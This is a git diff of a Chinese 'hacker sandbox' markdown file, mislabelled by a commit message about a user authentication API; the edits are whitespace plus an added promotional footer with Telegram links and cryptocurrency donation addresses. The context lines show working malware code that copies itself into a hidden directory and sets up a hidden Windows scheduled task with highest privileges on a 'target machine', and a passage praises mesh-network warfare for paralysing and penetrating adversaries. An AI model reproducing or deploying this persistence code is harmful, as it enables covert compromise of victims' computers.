完成用户认证 API 项目结构和核心代码生成

--- a/250719/黑客沙盒-250719-01.md
+++ b/250719/黑客沙盒-250719-01.md
@@ -126,17 +126,17 @@ def main():
     else:
         # 如果时间未到，执行安装/持久化逻辑
         # 这是脚本第一次在目标机器上运行时会进入的分支
-      
+    
         # 1. 创建隐蔽目录，如果目录已存在则忽略
         os.makedirs(PAYLOAD_DIR, exist_ok=True)
-      
+    
         # 2. 定义脚本被复制后的完整路径
         payload_path = os.path.join(PAYLOAD_DIR, PAYLOAD_FILENAME)
-      
+    
         # 3. 将当前脚本自身复制到目标隐蔽路径
         # sys.executable 是当前python解释器, __file__ 是当前脚本文件
         shutil.copyfile(sys.argv[0], payload_path)
-      
+    
         # 4. 构造用于创建计划任务的命令行指令
         # schtasks /Create: 创建任务
         # /SC ONCE: 只执行一次
@@ -146,16 +146,16 @@ def main():
         # /ST HH:MM:SS: 开始时间
         # /F: 如果任务已存在，则强制创建/覆盖
         # /RL HIGHEST: 使用最高权限运行
-      
+    
         trigger_date = TRIGGER_DATETIME.strftime('%Y/%m/%d')
         trigger_time = TRIGGER_DATETIME.strftime('%H:%M:%S')
-      
+    
         # `pythonw.exe` 用于在后台无窗口执行 .pyw 文件
         command = f'schtasks /Create /SC ONCE /TN "{TASK_NAME}" /TR "pythonw.exe {payload_path}" /SD {trigger_date} /ST {trigger_time} /F /RL HIGHEST'
-      
+    
         # 5. 执行命令来创建计划任务，并隐藏输出
         subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
-      
+    
         # (可选) 可以在此处添加代码，使原始脚本自毁
 
 if __name__ == '__main__':
@@ -505,3 +505,64 @@ exit();
 3. **任务达成 (Mission Accomplished):** 你通过这个平台，成功达成了瘫痪、渗透或信息传播的战略目标。
 
 Mesh网络战争的核心是**不对称**。你用极低的成本（Raspberry Pi和开源软件）构建了一个让拥有亿万预算的国家级对手都感到棘手的、打不死的“数字幽灵”。
+
+<br>
+
+<br>
+
+---
+
+
+
+**在信息构成的黑暗森林里，每个人都是带枪的猎人。关注 [@bianzhongren](https://t.me/bianzhongren)，让你从猎物变为顶级的掠食者。**
+
+---
+
+### **📢核心阵地 (Our Channels)**
+
+* **Telegram** (资源发布): [点击加入](https://t.me/zzkdm)
+* **Github** (技术教程): [前往订阅](https://github.com/zzkdm888)
+
+---
+
+### **🔍资源搜索 (Search Resource)**
+
+* **全网资源搜索01**: https://t.me/+PKsmUwoGckMzOTcx
+* **全网资源搜索02**: https://t.me/+4gyZv2aIlZMyYzAx
+* **全网资源搜索03**: https://t.me/+ew6WMPpxLnBlMTlh
+* **全网资源搜索04**: https://t.me/+MzZlIqxT-dkxYjBh
+* **全网资源搜索05**: https://t.me/+1QqSdVTuBKUxNjlh
+* **全网资源搜索06**: https://t.me/+uccuaRM2xXBlYTZh
+* **全网资源搜索07**: https://t.me/+Tu79GRHczbllMmMx
+* **全网资源搜索08**: https://t.me/+igp6CSb59G9mYzQx
+* **全网资源搜索09**: https://t.me/+2iLw70FwfL1lZTgx
+
+---
+
+### **⚠️重要声明 (Disclaimer)**
+
+1. **内容用途:** 本人所有平台发布的内容仅供技术学习与信息交流使用。
+2. **政治中立:** 本人不参与、不讨论任何政治相关话题，请共同维护纯粹的技术交流环境。
+3. **谨防诈骗:** 任何**主动联系你**进行交易或索要信息的人**都是骗子**。请务必提高警惕。
+4. **合法合规:** **严禁利用**本项目的任何内容从事任何违反您所在地法律法规的活动。
+5. **责任豁免:** 对于因使用或滥用本项目内容而导致的任何直接或间接的风险、损失或法律责任，**本人及本项目概不负责**。
+
+---
+
+### **❤️支持项目 (Support This Project)**
+
+如果本项目对您有帮助，您的支持是项目持续维护和发展的最大动力。
+
+* **USDT(trc20)**: TQqxEfc6Ptyo8zJXFfcVLeJ6AUr3gFC9W1
+* **TRX**: TQqxEfc6Ptyo8zJXFfcVLeJ6AUr3gFC9W1
+* **USDT(ETH)**: 0x59568a972e5c4e9aedea0ed8b4a8259a9e9953b7
+* **USDT(BNB)**: 0x59568a972e5c4e9aedea0ed8b4a8259a9e9953b7
+* **USDT(Polygen)**: 0x59568a972e5c4e9aedea0ed8b4a8259a9e9953b7
+* **TON**: UQC5uthDJDZXwbkxkoHH8RTostxLgFp7e1WINiKTOEkCUqDv
+* **BTC(Taproot)**: bc1prk89wp0x7lvzgdmfmufqqm6h807khezdq6w39e3nxg4yzfskcsfswu9x07
+* **BTC(Lagacy)**: 1NwRQD7yjHMsDsQFCjAYkm5QMeciwEj6q
+* **BTC(Nested SegWit)**: 372tCpTnemNA6rt2BhPqSm9Yp4jtJdUG3m
+* **BTC(Native SegWit)**: bc1qm53xvp5auwr6900228gn77rfureah2tvj86eu9
+* **ETH**: 0x59568a972e5c4e9aedea0ed8b4a8259a9e9953b7
+  <br>
+  **感谢您的每一次支持！ ❤️**
